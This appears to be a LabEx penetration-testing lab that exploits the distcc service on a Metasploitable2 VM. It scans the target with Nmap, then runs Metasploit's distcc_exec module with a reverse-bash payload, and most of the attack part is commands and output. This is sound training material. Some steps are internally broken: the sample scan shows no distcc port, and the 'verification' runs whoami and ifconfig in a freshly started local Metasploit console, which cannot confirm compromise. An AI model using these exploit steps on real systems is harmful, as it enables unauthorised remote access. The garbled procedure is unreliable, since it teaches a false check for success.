Penetration Testing | Metasploitable2 | Kali Linux

Introduction

In this lab, we will be conducting penetration testing on the Metasploitable2 target machine provided by LabEx using the Kali terminal. The focus will be on understanding the principles and process of attacking the Distcc service. At the end of the lab, recommended readings and homework assignments are provided.

Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL cysec(("`Cyber Security`")) -.-> cysec/NmapGroup(["`Nmap`"]) cysec/NmapGroup -.-> cysec/nmap_port_scanning("`Nmap Port Scanning Methods`") cysec/NmapGroup -.-> cysec/nmap_timing_performance("`Nmap Timing and Performance`") subgraph Lab Skills cysec/nmap_port_scanning -.-> lab-289551{{"`Attacking Distcc to Gain Privileges`"}} cysec/nmap_timing_performance -.-> lab-289551{{"`Attacking Distcc to Gain Privileges`"}} end

Start the Lab Environment

Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:

sudo virsh start Metasploitable2

Test the connectivity to the target machine by pinging it:

ping 192.168.122.102

Press Ctrl+C to stop the ping.

Launch the Kali Linux container and enter the bash environment by running:

docker run -ti --network host b5b709a49cd5 bash

Inside the Kali container, test the network connection to the target machine:

ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

Perform Penetration Testing

The Distcc service vulnerability principle:

Distcc is used for distributed compilation of large codebases on network servers. However, if misconfigured, it can be abused to execute commands. This vulnerability is present in XCode 1.5 and other versions of Distcc 2.x due to the lack of access restrictions on the server port.

In simple terms, the service lacks proper checks on ports and executed tasks, allowing attackers to leverage the distributed compilation tasks to execute their own commands.

Vulnerability indexes:

Vulnerability attack module code:

exploit/unix/misc/distcc_exec

First, start msfconsole to enter the operation interface:

cd ~
msfconsole

Use the Nmap scanning tool to scan the target host for open ports:

nmap -sV -T4 192.168.122.102

Here's an example of the output you might see:

[*] exec: nmap -sV -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-30 21:51 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0075s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
53/tcp   open  domain  ISC BIND 9.4.2
111/tcp  open  rpcbind 2 (RPC #100000)
3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.41 seconds

Based on the scan results, search for the module corresponding to the port service you want to attack:

search distcc

In the Kali MSF terminal, use the use command to select the appropriate module:

use exploit/unix/misc/distcc_exec

Then, use the show options command to display the module parameters:

show options

Here's an example of the output you might see:

Module options (exploit/unix/misc/distcc_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
                                       it.html
   RPORT    3632             yes       The target port (TCP)


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.140.88    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

Set the target host parameter RHOST to 192.168.122.102

set RHOST 192.168.122.102

Once everything is set, use the exploit command to attack the host:

exploit

Press Ctrl+D to quit the Metasploit console then start the inspection

Verify Successful Penetration

To verify if the penetration was successful, use the following commands: whoami, hostname, and ifconfig (to check the IP address):

First of all, if you are not in the Metasploit console, you should start the Metasploit console:

cd ~
msfconsole

Check the current user:

whoami

Check the hostname:

hostname

Check the IP address of the compromised host:

ifconfig

If the hostname and IP address match the target machine (192.168.122.102), it indicates that the penetration test was successful.

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, we learned about the principles and process of attacking the Distcc service. We gained hands-on experience with Nmap penetration scanning, using Metasploit to exploit the Distcc vulnerability, and verifying successful penetration. The lab provided a practical understanding of vulnerability analysis and exploitation techniques.

Attacking Distcc to Gain Privileges